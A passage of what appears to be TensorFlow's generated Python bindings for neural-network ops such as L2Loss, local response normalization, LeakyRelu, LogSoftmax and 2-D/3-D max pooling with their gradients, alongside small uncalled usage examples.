"L2Loss", _inputs_flat, _attrs, _result)
_result, = _result
return _result
L2Loss = tf_export("raw_ops.L2Loss")(_ops.to_raw_op(l2_loss))
def l2_loss_eager_fallback(t, name, ctx):
_attr_T, (t,) = _execute.args_to_matching_eager([t], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [t]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"L2Loss", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"L2Loss", _inputs_flat, _attrs, _result)
_result, = _result
return _result
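# A small worked example of the L2Loss op above, matching the docstring
# formula sum(t ** 2) / 2. Nothing in this module calls this helper.
def _example_l2_loss():
  import tensorflow as tf
  t = tf.constant([1.0, 2.0, 3.0])
  # (1 + 4 + 9) / 2 = 7.0
  return tf.raw_ops.L2Loss(t=t)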
@_dispatch.add_dispatch_list
@tf_export('nn.local_response_normalization', 'nn.lrn')
def lrn(input, depth_radius=5, bias=1, alpha=1, beta=0.5, name=None):
r"""Local Response Normalization.
The 4-D `input` tensor is treated as a 3-D array of 1-D vectors (along the last
dimension), and each vector is normalized independently. Within a given vector,
each component is divided by the weighted, squared sum of inputs within
`depth_radius`. In detail,
sqr_sum[a, b, c, d] =
sum(input[a, b, c, d - depth_radius : d + depth_radius + 1] ** 2)
output = input / (bias + alpha * sqr_sum) ** beta
For details, see [Krizhevsky et al., ImageNet classification with deep
convolutional neural networks (NIPS 2012)](http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks).
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
4-D.
depth_radius: An optional `int`. Defaults to `5`.
0-D. Half-width of the 1-D normalization window.
bias: An optional `float`. Defaults to `1`.
An offset (usually positive to avoid dividing by 0).
alpha: An optional `float`. Defaults to `1`.
A scale factor, usually positive.
beta: An optional `float`. Defaults to `0.5`. An exponent.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "LRN", name, input, "depth_radius", depth_radius, "bias", bias,
"alpha", alpha, "beta", beta)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return lrn_eager_fallback(
input, depth_radius=depth_radius, bias=bias, alpha=alpha, beta=beta,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
lrn, (), dict(input=input, depth_radius=depth_radius, bias=bias,
alpha=alpha, beta=beta, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
if depth_radius is None:
depth_radius = 5
depth_radius = _execute.make_int(depth_radius, "depth_radius")
if bias is None:
bias = 1
bias = _execute.make_float(bias, "bias")
if alpha is None:
alpha = 1
alpha = _execute.make_float(alpha, "alpha")
if beta is None:
beta = 0.5
beta = _execute.make_float(beta, "beta")
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"LRN", input=input, depth_radius=depth_radius, bias=bias, alpha=alpha,
beta=beta, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
lrn, (), dict(input=input, depth_radius=depth_radius, bias=bias,
alpha=alpha, beta=beta, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("depth_radius", _op._get_attr_int("depth_radius"), "bias",
_op.get_attr("bias"), "alpha", _op.get_attr("alpha"), "beta",
_op.get_attr("beta"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"LRN", _inputs_flat, _attrs, _result)
_result, = _result
return _result
LRN = tf_export("raw_ops.LRN")(_ops.to_raw_op(lrn))
def lrn_eager_fallback(input, depth_radius, bias, alpha, beta, name, ctx):
if depth_radius is None:
depth_radius = 5
depth_radius = _execute.make_int(depth_radius, "depth_radius")
if bias is None:
bias = 1
bias = _execute.make_float(bias, "bias")
if alpha is None:
alpha = 1
alpha = _execute.make_float(alpha, "alpha")
if beta is None:
beta = 0.5
beta = _execute.make_float(beta, "beta")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ], _dtypes.float32)
_inputs_flat = [input]
_attrs = ("depth_radius", depth_radius, "bias", bias, "alpha", alpha,
"beta", beta, "T", _attr_T)
_result = _execute.execute(b"LRN", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"LRN", _inputs_flat, _attrs, _result)
_result, = _result
return _result
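# A minimal sketch of the LRN op above on a 4-D NHWC tensor: each depth
# vector is normalized by the squared sum of its neighbors within
# depth_radius, i.e. output = input / (bias + alpha * sqr_sum) ** beta.
# Shapes and attribute values are illustrative; never called in this module.
def _example_lrn():
  import tensorflow as tf
  x = tf.random.normal([1, 2, 2, 8])
  return tf.raw_ops.LRN(input=x, depth_radius=2, bias=1.0, alpha=1.0,
                        beta=0.5)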
def lrn_grad(input_grads, input_image, output_image, depth_radius=5, bias=1, alpha=1, beta=0.5, name=None):
r"""Gradients for Local Response Normalization.
Args:
input_grads: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
4-D with shape `[batch, height, width, channels]`.
input_image: A `Tensor`. Must have the same type as `input_grads`.
4-D with shape `[batch, height, width, channels]`.
output_image: A `Tensor`. Must have the same type as `input_grads`.
4-D with shape `[batch, height, width, channels]`.
depth_radius: An optional `int`. Defaults to `5`. A depth radius.
bias: An optional `float`. Defaults to `1`.
An offset (usually > 0 to avoid dividing by 0).
alpha: An optional `float`. Defaults to `1`.
A scale factor, usually positive.
beta: An optional `float`. Defaults to `0.5`. An exponent.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input_grads`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "LRNGrad", name, input_grads, input_image, output_image,
"depth_radius", depth_radius, "bias", bias, "alpha", alpha, "beta",
beta)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return lrn_grad_eager_fallback(
input_grads, input_image, output_image, depth_radius=depth_radius,
bias=bias, alpha=alpha, beta=beta, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if depth_radius is None:
depth_radius = 5
depth_radius = _execute.make_int(depth_radius, "depth_radius")
if bias is None:
bias = 1
bias = _execute.make_float(bias, "bias")
if alpha is None:
alpha = 1
alpha = _execute.make_float(alpha, "alpha")
if beta is None:
beta = 0.5
beta = _execute.make_float(beta, "beta")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"LRNGrad", input_grads=input_grads, input_image=input_image,
output_image=output_image, depth_radius=depth_radius,
bias=bias, alpha=alpha, beta=beta, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("depth_radius", _op._get_attr_int("depth_radius"), "bias",
_op.get_attr("bias"), "alpha", _op.get_attr("alpha"), "beta",
_op.get_attr("beta"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"LRNGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
LRNGrad = tf_export("raw_ops.LRNGrad")(_ops.to_raw_op(lrn_grad))
def lrn_grad_eager_fallback(input_grads, input_image, output_image, depth_radius, bias, alpha, beta, name, ctx):
if depth_radius is None:
depth_radius = 5
depth_radius = _execute.make_int(depth_radius, "depth_radius")
if bias is None:
bias = 1
bias = _execute.make_float(bias, "bias")
if alpha is None:
alpha = 1
alpha = _execute.make_float(alpha, "alpha")
if beta is None:
beta = 0.5
beta = _execute.make_float(beta, "beta")
_attr_T, _inputs_T = _execute.args_to_matching_eager([input_grads, input_image, output_image], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ], _dtypes.float32)
(input_grads, input_image, output_image) = _inputs_T
_inputs_flat = [input_grads, input_image, output_image]
_attrs = ("depth_radius", depth_radius, "bias", bias, "alpha", alpha,
"beta", beta, "T", _attr_T)
_result = _execute.execute(b"LRNGrad", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"LRNGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def leaky_relu(features, alpha=0.2, name=None):
r"""Computes rectified linear: `max(features, features * alpha)`.
Args:
features: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
alpha: An optional `float`. Defaults to `0.2`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "LeakyRelu", name, features, "alpha", alpha)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return leaky_relu_eager_fallback(
features, alpha=alpha, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if alpha is None:
alpha = 0.2
alpha = _execute.make_float(alpha, "alpha")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"LeakyRelu", features=features, alpha=alpha, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("alpha", _op.get_attr("alpha"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"LeakyRelu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
LeakyRelu = tf_export("raw_ops.LeakyRelu")(_ops.to_raw_op(leaky_relu))
def leaky_relu_eager_fallback(features, alpha, name, ctx):
if alpha is None:
alpha = 0.2
alpha = _execute.make_float(alpha, "alpha")
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ], _dtypes.float32)
_inputs_flat = [features]
_attrs = ("alpha", alpha, "T", _attr_T)
_result = _execute.execute(b"LeakyRelu", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"LeakyRelu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
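# A small worked example of the LeakyRelu op above: positive inputs pass
# through unchanged, negative inputs are scaled by alpha. Never called in
# this module.
def _example_leaky_relu():
  import tensorflow as tf
  features = tf.constant([-2.0, 0.0, 3.0])
  # max(features, features * 0.2) -> [-0.4, 0.0, 3.0]
  return tf.raw_ops.LeakyRelu(features=features, alpha=0.2)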
def leaky_relu_grad(gradients, features, alpha=0.2, name=None):
r"""Computes rectified linear gradients for a LeakyRelu operation.
Args:
gradients: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
The backpropagated gradients to the corresponding LeakyRelu operation.
features: A `Tensor`. Must have the same type as `gradients`.
The features passed as input to the corresponding LeakyRelu operation,
OR the outputs of that operation (both work equivalently).
alpha: An optional `float`. Defaults to `0.2`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `gradients`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "LeakyReluGrad", name, gradients, features, "alpha", alpha)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return leaky_relu_grad_eager_fallback(
gradients, features, alpha=alpha, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if alpha is None:
alpha = 0.2
alpha = _execute.make_float(alpha, "alpha")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"LeakyReluGrad", gradients=gradients, features=features, alpha=alpha,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("alpha", _op.get_attr("alpha"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"LeakyReluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
LeakyReluGrad = tf_export("raw_ops.LeakyReluGrad")(_ops.to_raw_op(leaky_relu_grad))
def leaky_relu_grad_eager_fallback(gradients, features, alpha, name, ctx):
if alpha is None:
alpha = 0.2
alpha = _execute.make_float(alpha, "alpha")
_attr_T, _inputs_T = _execute.args_to_matching_eager([gradients, features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ], _dtypes.float32)
(gradients, features) = _inputs_T
_inputs_flat = [gradients, features]
_attrs = ("alpha", alpha, "T", _attr_T)
_result = _execute.execute(b"LeakyReluGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"LeakyReluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def log_softmax(logits, name=None):
r"""Computes log softmax activations.
For each batch `i` and class `j` we have
logsoftmax[i, j] = logits[i, j] - log(sum(exp(logits[i])))
Args:
logits: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
2-D with shape `[batch_size, num_classes]`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `logits`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "LogSoftmax", name, logits)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return log_softmax_eager_fallback(
logits, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"LogSoftmax", logits=logits, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"LogSoftmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
LogSoftmax = tf_export("raw_ops.LogSoftmax")(_ops.to_raw_op(log_softmax))
def log_softmax_eager_fallback(logits, name, ctx):
_attr_T, (logits,) = _execute.args_to_matching_eager([logits], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [logits]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"LogSoftmax", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"LogSoftmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
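# A small worked example of the LogSoftmax op above; each row follows
# logits[i, j] - log(sum(exp(logits[i]))), so exp() of the result sums to 1
# per row. Never called in this module.
def _example_log_softmax():
  import tensorflow as tf
  logits = tf.constant([[1.0, 2.0, 3.0]])
  return tf.raw_ops.LogSoftmax(logits=logits)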
def max_pool(input, ksize, strides, padding, explicit_paddings=[], data_format="NHWC", name=None):
r"""Performs max pooling on the input.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`, `int32`, `int64`, `uint8`, `int16`, `int8`, `uint16`, `qint8`.
4-D input to pool over.
ksize: A list of `ints` that has length `>= 4`.
The size of the window for each dimension of the input tensor.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
data_format: An optional `string` from: `"NHWC", "NCHW", "NCHW_VECT_C"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPool", name, input, "ksize", ksize, "strides", strides,
"padding", padding, "explicit_paddings", explicit_paddings,
"data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_eager_fallback(
input, ksize=ksize, strides=strides, padding=padding,
explicit_paddings=explicit_paddings, data_format=data_format,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'max_pool' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPool", input=input, ksize=ksize, strides=strides, padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "ksize", _op.get_attr("ksize"),
"strides", _op.get_attr("strides"), "padding",
_op.get_attr("padding"), "explicit_paddings",
_op.get_attr("explicit_paddings"), "data_format",
_op.get_attr("data_format"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPool", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPool = tf_export("raw_ops.MaxPool")(_ops.to_raw_op(max_pool))
def max_pool_eager_fallback(input, ksize, strides, padding, explicit_paddings, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'max_pool' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.int64, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.uint16, _dtypes.qint8, ], _dtypes.float32)
_inputs_flat = [input]
_attrs = ("T", _attr_T, "ksize", ksize, "strides", strides, "padding",
padding, "explicit_paddings", explicit_paddings, "data_format", data_format)
_result = _execute.execute(b"MaxPool", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPool", _inputs_flat, _attrs, _result)
_result, = _result
return _result
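# A minimal sketch of the MaxPool op above: a 2x2 window with stride 2 over
# a 4x4 NHWC input halves each spatial dimension. Never called in this
# module.
def _example_max_pool():
  import tensorflow as tf
  x = tf.reshape(tf.range(16.0), [1, 4, 4, 1])
  # VALID padding, so the output shape is [1, 2, 2, 1].
  return tf.raw_ops.MaxPool(input=x, ksize=[1, 2, 2, 1],
                            strides=[1, 2, 2, 1], padding="VALID")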
def max_pool3d(input, ksize, strides, padding, data_format="NDHWC", name=None):
r"""Performs 3D max pooling on the input.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
Shape `[batch, depth, rows, cols, channels]` tensor to pool over.
ksize: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The size of the window for each dimension of
the input tensor. Must have `ksize[0] = ksize[4] = 1`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPool3D", name, input, "ksize", ksize, "strides", strides,
"padding", padding, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool3d_eager_fallback(
input, ksize=ksize, strides=strides, padding=padding,
data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool3d' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool3d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPool3D", input=input, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPool3D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPool3D = tf_export("raw_ops.MaxPool3D")(_ops.to_raw_op(max_pool3d))
def max_pool3d_eager_fallback(input, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool3d' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool3d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ])
_inputs_flat = [input]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"MaxPool3D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPool3D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
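# Illustrative usage sketch (hypothetical helper, not part of the generated
# bindings; never called at import time). MaxPool3D pools over the three
# spatial dimensions of an NDHWC tensor; the window and stride lists have
# length 5 with ksize[0] = ksize[4] = 1.
def _example_max_pool3d():
  import tensorflow as tf
  x = tf.random.normal([1, 4, 4, 4, 3])  # [batch, depth, rows, cols, channels]
  y = tf.raw_ops.MaxPool3D(input=x, ksize=[1, 2, 2, 2, 1],
                           strides=[1, 2, 2, 2, 1], padding="VALID")
  return y  # shape (1, 2, 2, 2, 3)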
def max_pool3d_grad(orig_input, orig_output, grad, ksize, strides, padding, data_format="NDHWC", name=None):
r"""Computes gradients of 3D max pooling function.
Args:
orig_input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
The original input tensor.
orig_output: A `Tensor`. Must have the same type as `orig_input`.
The original output tensor.
grad: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
Output backprop of shape `[batch, depth, rows, cols, channels]`.
ksize: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The size of the window for each dimension of
the input tensor. Must have `ksize[0] = ksize[4] = 1`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `grad`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPool3DGrad", name, orig_input, orig_output, grad, "ksize",
ksize, "strides", strides, "padding", padding, "data_format",
data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool3d_grad_eager_fallback(
orig_input, orig_output, grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool3d_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool3d_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPool3DGrad", orig_input=orig_input, orig_output=orig_output,
grad=grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"), "TInput", _op._get_attr_type("TInput"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPool3DGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPool3DGrad = tf_export("raw_ops.MaxPool3DGrad")(_ops.to_raw_op(max_pool3d_grad))
def max_pool3d_grad_eager_fallback(orig_input, orig_output, grad, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool3d_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool3d_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, (grad,) = _execute.args_to_matching_eager([grad], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ], _dtypes.float32)
_attr_TInput, _inputs_TInput = _execute.args_to_matching_eager([orig_input, orig_output], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ], _dtypes.float32)
(orig_input, orig_output) = _inputs_TInput
_inputs_flat = [orig_input, orig_output, grad]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T, "TInput", _attr_TInput)
_result = _execute.execute(b"MaxPool3DGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPool3DGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
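# Illustrative usage sketch (hypothetical helper, not part of the generated
# bindings). MaxPool3DGrad takes the forward op's input and output plus the
# incoming gradient, and routes each gradient element back to the position of
# the corresponding window maximum.
def _example_max_pool3d_grad():
  import tensorflow as tf
  x = tf.random.normal([1, 4, 4, 4, 1])
  ksize = strides = [1, 2, 2, 2, 1]
  y = tf.raw_ops.MaxPool3D(input=x, ksize=ksize, strides=strides,
                           padding="VALID")
  dx = tf.raw_ops.MaxPool3DGrad(orig_input=x, orig_output=y,
                                grad=tf.ones_like(y), ksize=ksize,
                                strides=strides, padding="VALID")
  return dx  # same shape as x; nonzero only at the window maxima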
def max_pool3d_grad_grad(orig_input, orig_output, grad, ksize, strides, padding, data_format="NDHWC", name=None):
r"""Computes second-order gradients of the maxpooling function.
Args:
